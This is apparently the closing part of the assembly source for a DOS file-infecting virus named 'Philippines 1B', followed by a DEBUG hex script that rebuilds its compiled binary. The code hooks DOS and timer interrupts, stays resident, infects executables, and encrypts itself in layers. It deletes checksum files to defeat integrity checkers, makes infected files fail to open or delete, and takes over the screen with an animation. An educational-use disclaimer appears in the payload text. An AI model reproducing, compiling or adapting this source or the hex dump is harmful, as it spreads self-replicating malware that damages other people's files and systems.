JMP CS:Int8Address ;
;
Bios2:POPF ;
CLD ;
PUSH CS ;
POP DS ;
PUSH DS ;
POP ES ;
MOV SI,Offset Swimmer5Top ; decrypt swimmer data
MOV CX,SwimmerLen ;
CALL EncryptData ;
MOV BX,0B800h ; get video segment
INT 11h ;
AND AL,30h ;
CMP AL,30h ;
JNE Bios3 ;
MOV BX,0B000h ;
Bios3:MOV DS,BX ; save current text screen
XOR SI,SI ; this crashes system because
MOV DI,Offset SaveScreen ; mcb link is destroyed by
MOV CX,4000 ; save screen
PUSH CX ;
PUSH DI ; screen of graphics not saved/
PUSH SI ; not saved properly
REPE MOVSW ;
MOV AX,3 ; flip to mode 3 force text mode
INT 10h ;
MOV AH,1 ;
MOV CX,2020h ; hide cursor
INT 10h ;
PUSH CS ;
PUSH DS ;
POP ES ;
POP DS ;
POP DI ;
POP SI ; restore screen
POP CX ; swimmer written directly to
MOV BP,CX ; video memory
REPE MOVSW ;
Bios4:XOR BX,BX ; swimmer does the breaststroke
Bios5:MOV CL,15 ;
Bios6:PUSH CX ; display swimmer1 15 times
MOV SI,Offset Swimmer1Sides ;
Bios7:MOV DI,BX ; ==---O==
CMP BX,BP ;
JB Bios8 ;
CALL OverTheTop ;
Bios8:MOV CL,7 ;
REPE MOVSW ;
MOV SI,Offset Swimmer1Middle ;
MOV DI,BX ;
ADD DI,160 ;
MOV CL,9 ;
REPE MOVSW ;
MOV SI,Offset Swimmer1Sides ;
MOV DI,BX ;
ADD DI,320 ;
MOV CL,7 ;
REPE MOVSW ;
CALL DoDelay ;
ADD BX,2 ;
POP CX ;
LOOP Bios6 ;
MOV CL,3 ; display swimmer2 3 times
Bios9:PUSH CX ;
MOV SI,Offset Swimmer2Top ; /
MOV DI,BX ; ==---O
CMP BX,BP ; \
JB Bios10 ;
CALL OverTheTop ;
Bios10:MOV CL,8 ;
REPE MOVSW ;
MOV SI,Offset Swimmer2Middle ;
MOV DI,BX ;
ADD DI,160 ;
MOV CL,7 ;
REPE MOVSW ;
MOV SI,Offset Swimmer2Bottom ;
MOV DI,BX ;
ADD DI,320 ;
MOV CL,8 ;
REPE MOVSW ;
CALL DoDelay ;
ADD BX,2 ;
POP CX ;
LOOP Bios9 ;
MOV CL,3 ; display swimmer3 3 times
Bios11:PUSH CX ;
MOV SI,Offset Swimmer3Top ; \ /
MOV DI,BX ; ---O
CMP BX,BP ; / \
JB Bios12 ;
CALL OverTheTop ;
Bios12:MOV CL,7 ;
REPE MOVSW ;
MOV SI,Offset Swimmer3Middle ;
MOV DI,BX ;
ADD DI,160 ;
MOV CL,6 ;
REPE MOVSW ;
MOV SI,Offset Swimmer3Bottom ;
MOV DI,BX ;
ADD DI,320 ;
MOV CL,7 ;
REPE MOVSW ;
CALL DoDelay ;
ADD BX,2 ;
POP CX ;
LOOP Bios11 ;
MOV CL,3 ; display swimmer4 3 times
Bios13:PUSH CX ;
MOV SI,Offset Swimmer4Top ; \ \
MOV DI,BX ; ---O
CMP BX,BP ; / /
JB Bios14 ;
CALL OverTheTop ;
Bios14:MOV CL,5 ;
REPE MOVSW ;
MOV SI,Offset Swimmer4Middle ;
MOV DI,BX ;
ADD DI,160 ;
MOV CL,5 ;
REPE MOVSW ;
MOV SI,Offset Swimmer4Bottom ;
MOV DI,BX ;
ADD DI,320 ;
MOV CL,5 ;
REPE MOVSW ;
CALL DoDelay ;
ADD BX,2 ;
POP CX ;
LOOP Bios13 ;
MOV CL,4 ; display swimmer5 4 times
Bios15:PUSH CX ;
MOV SI,Offset Swimmer5Top ; \
MOV DI,BX ; ==---O
CMP BX,BP ; /
JB Bios16 ;
CALL OverTheTop ;
Bios16:MOV CL,7 ;
REPE MOVSW ;
MOV SI,Offset Swimmer5Middle ;
MOV DI,BX ;
ADD DI,160 ;
MOV CL,7 ;
REPE MOVSW ;
MOV SI,Offset Swimmer5Bottom ;
MOV DI,BX ;
ADD DI,320 ;
MOV CL,7 ;
REPE MOVSW ;
CALL DoDelay ;
ADD BX,2 ;
POP CX ;
LOOP Bios15 ;
JMP Bios5 ; go back to swimmer1
;
;--------------------------------------------------------------
InitV5:MOV AH,4Ah ; modify mem to what
MOV BX,ResidePara ; we need
INT 21h ;
;----------------------------------------;---------------------
PUSH CS ; set triggers
POP DS ;
MOV Timer,0 ;
MOV BYTE PTR HourCount,4 ;
;----------------------------------------;---------------------
; hook and save interrupts
MOV AX,3521h ;
INT 21h ; save int 21...
MOV Int21CS,ES ;
MOV Int21IP,BX ;
MOV AH,25h ; ...and hook.
MOV DX,Offset Interrupt21 ;
CALL UseOldDos ;
MOV AX,3508h ;
CALL UseOldDos ; save int 08...
MOV Int8CS,ES ;
MOV Int8IP,BX ;
MOV AH,25h ; ...and hook.
MOV DX,Offset Interrupt8 ;
CALL UseOldDos ;
;----------------------------------------;---------------------
MOV ES,Environment ; get name of executing program
PUSH ES ; from the psp
POP DS ;
XOR DI,DI ;
MOV CX,7FFFh ;
XOR AL,AL ;
InitV6:REPNZ SCASB ;
CMP [DI],AL ;
LOOPNE InitV6 ;
SCASW ;
SCASB ;
MOV DX,DI ;
;----------------------------------------;---------------------
PUSH ES ;
PUSH CS ;
POP ES ;
CALL Propagate ; infect an exe first
;----------------------------------------;---------------------
MOV AX,4B00h ; execute host program
MOV BX,Offset ExecutePara ;
CALL UseOldDos ;
;----------------------------------------;---------------------
POP ES ;release environment
MOV AH,49h ;
CALL UseOldDos ;
;----------------------------------------;---------------------
MOV AH,31h ; and go resident
MOV DX,ResidePara ; as low mem TSR
INT 21h ;
;----------------------------------------;---------------------
OverTheTop: ; routine to write orig content
POP AX ; of screen
SUB AX,SubOff ;
PUSH AX ;
MOV SI,Offset SaveScreen ;
XOR DI,DI ;
PUSH DI ;
MOV CX,2000 ;
REPE MOVSW ;
CALL DoDelay ; pause
POP BX ;
RET ;
DoDelay: ; pause so that you would be
MOV DI,5 ; able to appreciate my swimmer
OverTheTop1: ;
NOT CX ; reset value of DI to adjust speed
OverTheTop2: ; of swimmer
NOP ;
LOOP OverTheTop2 ;
DEC DI ;
JNZ OverTheTop1 ;
RET ;
;
;----------------------------------------;---------------------
CheckAttrib: ;
CMP AH,43h ; is it call for get/check attrib
JE Attrib2 ;
Attrib1: ;
JMP Dos3 ; no, pass to old dos handler
Attrib2: ;
MOV CS:Environment,BP ; save bp
MOV BP,Offset Attrib3 ; set return point
JMP CheckIfInfected ; check file for infection
Attrib3: ;--------------------------
MOV BP,CS:Environment ; restore bp
CMP CS:ChkSum,9818h ; is file infected?
JNE Attrib1 ; if no, pass to old dos handler
;--------------------------
; yes, now we do mischief...
;...if set attrib, we set read only
OR AL,AL ;...if get attrib, we clear read only
JZ Attrib4 ; on return to caller
OR CL,1 ; set read only attrib bit
Attrib4: ;
POPF ; execute get/set attrib
CALL UseOldDos ;
JC Attrib5 ;
PUSHF ; save flags
AND CL,0FEh ; clear read only attrib bit
POPF ; restore flags
Attrib5: ;
IRET ; some childish prank!
; ...and you couldnt delete file.
;--------------------------------------------------------------
OpenFile: ; open file handler
CMP AH,3Dh ; another of my mischief...
JNE CheckAttrib ;
;
OpnFil1:MOV CS:Environment,BP ; save bp
MOV BP,Offset OpnFil2 ; set return offset
JMP CheckIfInfected ; check for infection
;
OpnFil2:MOV BP,CS:Environment ; restore bp
CMP CS:Chksum,9818h ; is infected?
JNE Attrib1 ; no, then pass to old dos handler
OpnFil4:POPF ;
CALL UseOldDos ; open the file
STC ; force an error
PUSH BP ;
PUSHF ;
POP AX ; pop ax = file handle is lost!!!!
MOV BP,SP ;
MOV [BP+6],AX ; set false flag register
POP BP ;
MOV AX,2 ; set error code == file not found
IRET ; return to caller
;
; user might have problems from
; having too many files opened
; or runs out of file handle
;--------------------------------------------------------------
SPoint DW ? ; stack pointer saved
;--------------------------------------------------------------
MemResChk: ; check for memory residency
MOV AL,0Fh ;
MOV AH,AL ; ax = f00f bx = 0ff0 on call
NOT AH ;
MOV BX,AX ;
NOT BX ;
INT 21h ;
CMP AX,BX ; ax = bx = 0ff0 on return
;
ASSUME CS:Philippines1B, DS:VectorTable ;
;
PUSH DS ;
PUSH ES ; i guess this will work
PUSHF ; if you are tracing the
XOR AX,AX ; code but not as intended
MOV DS,AX ; maybe a freeze...
LES AX,VectorTab19 ;
MOV VectorTab1CS,ES ; your guess is as good as mine
MOV VectorTab1IP,AX ;
POPF ;
POP ES ;
POP DS ;
;
ASSUME CS:Philippines1B, DS:Philippines1B
;
MemChk1: ;
RET ;
;--------------------------------------------------------------
; encrypt virus in com infection
;--------------------------------------------------------------
EncryptCom: ;
MOV BP,LoLen ;
ADD BP,100h ; set bp to offset start of vir
CALL PrepareToEncrypt ; copy vir to alloc mem
CALL XorMaker ; get xor operand
MOV SI,Offset InitC6+2 ;
MOV [SI],DL ; set decryptor operand
MOV SI,Offset FindFirstFile ;
MOV CX,ComEnc3 ;
MOV DI,SI ;
EncC1:LODSB ; encrypt third level
XOR AL,DL ;
STOSB ;
LOOP EncC1 ;
MOV SI,Offset InitC5 ;
MOV DX,ComEnc2 ;
MOV DI,SI ;
MOV CL,3 ; encrypt second level
EncC2:LODSB ;
ROL AL,CL ;
STOSB ;
DEC DX ;
JNZ EncC2 ;
MOV BX,Offset InitC2 ;
PUSH BX ;
ADD BX,BP ;
MOV DI,Offset ComEntry+5 ;
MOV SI,Offset InitC1 ;
MOV CS:[DI],BP ; set jumper with start of vir
MOV [SI-4],BX ; set start of decryption
CALL SubMaker ; get sub operand
MOV [SI+2],DL ; set decryptor operand
POP SI ;
MOV CX,ComEnc1 ;
MOV DI,SI ;
EncC4:LODSB ;
SUB AL,DH ; encrypt com top level
STOSB ;
LOOP EncC4 ;
PUSH CS ;
POP ES ;
CALL WriteVirusCode ; write virus
JMP Dos20 ; continue with infection
;--------------------------------------------------------------
LookForChkSum: ;
PUSH CS ; delete checksum file from
POP DS ; the directory the infected
PUSH CS ; file is located
POP ES ;
MOV AL,0 ;
MOV CX,140 ;
MOV DX,Offset ASCIIZ ;
MOV DI,DX ;
REPNZ SCASB ; get end of path
MOV AX,':\' ;
Look4Chk1: ;
DEC DI ; find start of filename
CMP BYTE PTR [DI-1],AL ;
JE Look4Chk2 ;
CMP BYTE PTR [DI-1],AH ;
JE Look4Chk2 ;
JMP Look4Chk1 ;
Look4Chk2: ;
MOV BP,DI ; save start of filename
MOV SI,Offset Checklist ; set up search mask
MOV CX,ChecklistLen ;
REPE MOVSB ;
CALL FindFirstFile ; find checksum file
JC Look4Chk5 ;
MOV SI,Offset ReadArea+1Eh ;
MOV DI,BP ;
Look4Chk4: ;
LODSB ; copy checksum file name
STOSB ;
OR AL,AL ;
JNZ Look4Chk4 ;
MOV AX,4301h ; clear attribute
XOR CX,CX ;
CALL UseOldDos ; and...
JC Look4Chk5 ;
MOV AH,41h ; delete checksum file
CALL UseOldDos ;
Look4Chk5: ;
JMP RestoreInt24 ; done.
;--------------------------------------------------------------
Message DB 'Likha ni Putoksa Kawayan sa Manila, '
;------------------------------------------------ end encrypted codes
Country DB 'Philippines' ; my eof signature
;------------------------------------------------ virii end
;------------------------------------------------ read buffer
ReadArea LABEL BYTE
ExeID DW ?
BytesLast DW ?
BlocksNo DW ?
Reloc1 DW ?
HeaderPara DW ?
MinPara DW ?
LoaderSw DW ?
OffsSS DW ?
OffsSP DW ?
Chksum DW ?
OffsIP DW ?
OffsCS DW ?
Reloc2 DW 10 DUP (?)
;------------------------------------------------ virus data
HourCount DB ?
FileType DB ?
FileHandle DW ?
Attribute DW ?
AllocMem DW ?
HiLen DW ?
LoLen DW ?
LastTime DW ?
Environment DW ?
FileTime DW ?
FileDate DW ?
Timer DW ?
Int8Address LABEL DWORD
Int8IP DW ?
Int8CS DW ?
Int24Address LABEL DWORD
Int24IP DW ?
Int24CS DW ?
Int21Address LABEL DWORD
Int21IP DW ?
Int21CS DW ?
ASCIIZ DB 16 DUP (?)
StackArea DB (4*16) DUP (?)
SaveScreen DW ?
;==============================================================
; first generation codes
;==============================================================
MessageFirstGen DB 13,10,7,'Philippines virus is alive.',7,7,7,13,10,'$'
FirstGeneration:
MOV AX,CS
MOV DS,AX
;------------------------------------------------ check if resident
CALL MemResChk
JNZ Inst1
MOV AH,9 ; terminate if resident
LEA DX,MessageFirstGen
INT 21h
MOV AH,4Ch
INT 21h
;------------------------------------------------ encrypt message and
;------------------------------------------------ swimmer data
Inst1:
CLD
PUSH ES
PUSH CS
POP ES
MOV SI,Offset MessageEnc
MOV CX,MessageLen
CALL EncryptData
MOV SI,Offset Swimmer5Top
MOV CX,SwimmerLen
CALL EncryptData
;------------------------------------------------ set-up exec param
POP ES
MOV AX,ES:[2Ch]
MOV CS:Environment,AX
MOV CS:ExecutePara6,ES
MOV CS:ExecutePara4,ES
MOV CS:ExecutePara2,ES
;------------------------------------------------ set my ss:sp
CLI
MOV AX,CS
MOV SS,AX
MOV SP,(Offset SaveScreen-1)
STI
JMP InitV5
;------------------------------------------------ use virus code
;------------------------------------------------ install routines
Philippines1B ENDS
END FirstGeneration
ÄÄ PHLPNS1B.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is compiled from the above source code of Phillippines 1B.
Similar to the orignal virus, Philippines 1, but for minor changes.
TASM 2.01 was used to compile the source code.
ÄÄ PHIL2796.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
N PHIL2796.COM
E 0100 BB 10 0A FC BD E0 08 55 C3 F7 06 1A 03 FF FF 74
E 0110 38 3C 18 98 07 C6 06 6F 03 00 EB 2D 1E 8E 1E 1A
E 0120 69 70 70 69 6E 65 73 2E 32 37 39 36 20 76 69 72
E 0130 75 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75
E 0140 20 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69 70
E 0150 70 69 6E 65 73 2E 0D 0A 42 72 6F 75 67 68 74 20
E 0160 74 6F 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48
E 0170 45 58 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A
E 0180 0A 48 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50
E 0190 75 74 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61
E 01A0 72 65 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62
E 01B0 6C 65 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69
E 01C0 6D 70 6C 69 65 64 0D 0A 61 6E 64 2F 6F 72 20 69
E 01D0 6D 61 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20
E 01E0 62 72 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79
E 01F0 20 74 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65
E 0200 20 6F 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 0D 0A
E 0210 74 68 69 73 20 76 69 72 69 69 2E 20 54 68 65 20
E 0220 70 65 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75
E 0230 74 65 73 20 74 68 69 73 20 76 69 72 69 69 20 62
E 0240 65 61 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E
E 0250 73 69 62 69 6C 69 74 79 0D 0A 66 6F 72 20 68 69
E 0260 73 2F 68 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A
E 0270 0A 54 68 69 73 20 76 69 72 69 69 20 69 73 20 73
E 0280 74 72 69 63 74 6C 79 20 66 6F 72 20 65 64 75 63
E 0290 61 74 69 6F 6E 61 6C 20 6F 72 20 72 65 73 65 61
E 02A0 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E 6C
E 02B0 79 2E 0D 0A 0A 24 08 20 1A 20 20 20 20 20 20 20
E 02C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 02D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 02E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 02F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0300 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0310 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0320 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0330 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0340 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0350 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0360 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0370 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0380 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0390 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 03F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0400 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0420 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0430 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0440 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0450 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0460 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0470 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0480 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0490 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 04F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0500 0E 1F BA 07 01 B4 09 CD 21 B4 4C CD 21 20 20 20
E 0510 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0520 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0530 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0540 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0550 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0560 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0570 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0580 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0590 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 05F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0600 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0610 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0620 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0630 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0640 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0650 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0660 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0670 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0680 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0690 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 06F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0700 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0710 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0720 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0730 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0740 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0750 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0760 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0770 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0780 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0790 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07D0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07E0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 07F0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0800 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0810 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0820 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0830 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0840 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0850 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0860 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0870 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0880 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 0890 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 08A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 08B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 08C0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
E 08D0 FF FF FF FF 4E 09 EC 04 ED 04 EE 04 F3 04 FF FF
E 08E0 BF EE 08 8B F7 AC 2C 09 AA 4B 74 02 EB F7 95 D1
E 08F0 F2 C7 09 97 0F 27 14 3C 08 94 00 C2 F5 13 FC AD
E 0900 0F 28 CC C4 19 13 05 C6 F9 20 5E CC F1 F9 0C 13
E 0910 DB 7E 11 0B DF D9 F3 13 DB 7D FA CC 05 94 E3 5B
E 0920 93 10 13 C9 7D 18 45 6A 7B 11 45 83 80 0D 35 29
E 0930 91 10 4C F4 F4 94 D4 4A 67 34 D7 5A 27 10 B9 37
E 0940 94 03 FB B7 C1 61 4E 41 2E 7E 18 42 4E 0A 7E 43
E 0950 17 10 37 CF 0F 22 14 0A F4 3F C1 58 56 42 4E 0A
E 0960 7E 31 89 46 4C 7E 2C 62 5A 8C F2 0D C1 65 43 41
E 0970 4E 08 7D 11 41 6E 08 7D 0C 58 EB FC 94 00 17 10
E 0980 C8 BB 09 C2 14 09 FC AF 7E CF 37 CF 0F 22 14 09
E 0990 62 CC 4C 58 56 56 4A 57 4D 37 4C 58 56 09 09 89
E 09A0 09 E3 0D 65 09 E3 0D 75 09 E3 0D 09 0B 19 09 E0
E 09B0 0C C7 EF 09 0C FE 94 07 C3 04 12 BA 0C B5 DB D1
E 09C0 B3 53 7D 0B F4 00 FE D8 09 21 B8 65 00 D6 50 51
E 09D0 6E AA 74 5E 53 AC B1 68 C8 02 D7 C4 C7 15 44 35
E 09E0 2F 4C C2 D7 22 AF 5C 74 35 77 4C 7E 35 75 34 C9
E 09F0 83 9F 74 6C A7 E4 4C 7C CD DA AF F4 74 FD 4F 7E
E 0A00 DD F6 90 1E 23 4E E4 03 3C B7 53 4B 35 91 4C 7E
E 0A10 F7 7C 1E 64 40 CD FB 9D 18 76 4C F4 74 28 76 AF
E 0A20 E1 4C FD 4F 64 9C 5C F2 8F 50 6C CA 3E E2 EA E2
E 0A30 9A 17 E5 F6 47 85 C5 AA A2 7E 5C 98 8B 74 3A D1
E 0A40 34 8B 1C F5 D1 C7 2D D2 34 F2 FA EA 02 E2 DA A4
E 0A50 64 35 F5 54 35 3A 74 5C 9C 9A A2 C2 AA BA B2 90
E 0A60 23 9D 23 E3 3C 63 6F 13 74 7F 63 3C 18 76 23 7F
E 0A70 6E 74 23 7F 4E 74 23 7F 2E 74 64 24 5C FF 6C A7
E 0A80 1A 54 AF 1B 74 35 4F 9D 44 BE D1 2C 9F 8F 44 FD
E 0A90 57 A5 3E 3D 45 5C C5 18 36 28 F6 97 30 3C BD 2D
E 0AA0 D3 5C 35 D9 A5 23 78 A3 AC 3C 74 C9 6C 7E 40 05
E 0AB0 9F C3 3C FD 57 24 9C B7 53 CB 35 26 54 30 A4 03
E 0AC0 3C 18 64 D3 3C B7 53 4B C7 F3 6C 35 8F 54 24 5C
E 0AD0 C7 C3 3C B7 74 8B 35 07 54 01 2A 00 B7 84 82 AF
E 0AE0 9D 9D C7 CD 9D 35 7F 54 AF 3C 74 C7 15 44 D7 9B
E 0AF0 35 B8 54 01 EC C7 04 74 35 40 54 C7 A5 44 AF 84
E 0B00 74 D7 9B 35 50 54 98 D7 A3 35 99 54 90 01 CC 9F
E 0B10 15 44 A7 6D 44 AF 3C 74 FD 67 C9 3C 70 A3 A5 44
E 0B20 B4 B8 C9 7C 2D 8E A5 FB 06 BF C3 3C 78 99 6C C3
E 0B30 C9 4C 48 DC 78 45 72 D7 E3 35 1A 54 01 65 DD 7D
E 0B40 DD 6D 3C 06 C9 4C 8B 74 14 01 AE BF F7 74 D7 32
E 0B50 35 B3 54 01 1E 7F A4 3C C7 C3 3C B7 74 7A 35 43
E 0B60 54 01 C2 30 24 94 3C B7 6C 7A FB 2E 35 94 54 01
E 0B70 12 B7 84 8B 35 D4 54 01 52 00 30 A4 C4 3C B7 74
E 0B80 DA 35 5C 54 30 24 33 3C 30 E4 43 3C FB 2E FB 06
E 0B90 B7 84 82 35 CD 7C 7F 83 3C 30 E4 73 3C F2 35 7D
E 0BA0 7C C7 15 44 AF 73 74 D7 9B 35 9E 7C B2 70 A3 15
E 0BB0 44 0A C2 D1 3C 8B 2E 5C 01 12 2D 08 74 2D 64 6C
E 0BC0 6F C5 44 7F 1E 74 6F 95 44 7F 0D 2C 6F 84 3C 7F
E 0BD0 D5 7C 6F 74 3C 7F 05 7C 6F F5 44 80 A3 25 44 74
E 0BE0 D1 6C 32 DD 63 3E 74 7C 64 25 44 80 06 74 7C 64
E 0BF0 0E 74 80 06 74 53 F5 7F 83 3C 30 E4 73 3C 4C 15
E 0C00 44 80 06 74 F9 7C 2D 37 74 DD E3 3E 74 3C 06 D1
E 0C10 6C 72 7F F5 44 30 E4 25 44 40 E4 73 3C 6F 83 3C
E 0C20 DD E3 0E 74 3B 64 D5 44 7F 84 3C 5E 64 74 3C A1
E 0C30 54 5E 64 A5 44 B4 B8 5E 64 95 44 30 3C 7F C5 44
E 0C40 A5 64 C2 6C 2D 6B 84 35 C3 7C AF 94 74 3D 12 6F
E 0C50 83 3C 4C F4 74 01 C2 4B F5 9D 7F 83 3C 4C 15 44
E 0C60 01 1A A4 5C 9F E4 4C A7 15 44 AF F4 74 FD 4F A5
E 0C70 64 C2 6C 2D 89 64 23 28 A4 83 3C 9F 15 44 DA AF
E 0C80 F4 74 FD 4F 24 9C 9A A7 7B 74 AF 2C 74 FD 57 5E
E 0C90 64 A5 44 B4 B8 35 15 84 AF 73 74 C7 15 44 D7 72
E 0CA0 35 35 84 40 24 33 3C 40 E4 43 3C B7 6C DA 35 C6
E 0CB0 84 D7 A3 35 CE 84 40 24 94 3C 80 2E 6C C7 C3 3C
E 0CC0 B7 6C 7A 35 4E 84 28 64 A4 3C D7 2A 35 97 84 2D
E 0CD0 99 64 74 6C F5 9D 35 63 74 44 06 D1 AD 48 05 E5
E 0CE0 C6 7E 23 40 E4 83 3C 23 40 24 73 3C 23 40 A4 C4
E 0CF0 3C 35 D8 84 AF 15 44 FB 06 D7 72 35 10 84 7E FB
E 0D00 76 0E C4 23 AB E4 53 3C 23 30 E4 53 3C C9 14 02
E 0D10 D7 13 35 E1 84 B2 23 FB 64 33 3C 7C 86 7C 6E DD
E 0D20 85 7C F6 80 AD 6C E1 64 40 86 DD 6D 7C F6 7E FF
E 0D30 E8 D8 E0 A8 9E F0 E8 9E 1F 48 40 F8 D8 18 A8 9E
E 0D40 D7 A8 38 A8 68 A8 F0 9E 18 A8 9E 07 A8 F0 E8 00
E 0D50 A8 FE 9E 1F E0 E8 00 E8 20 20 E8 F0 C8 18 A7 08
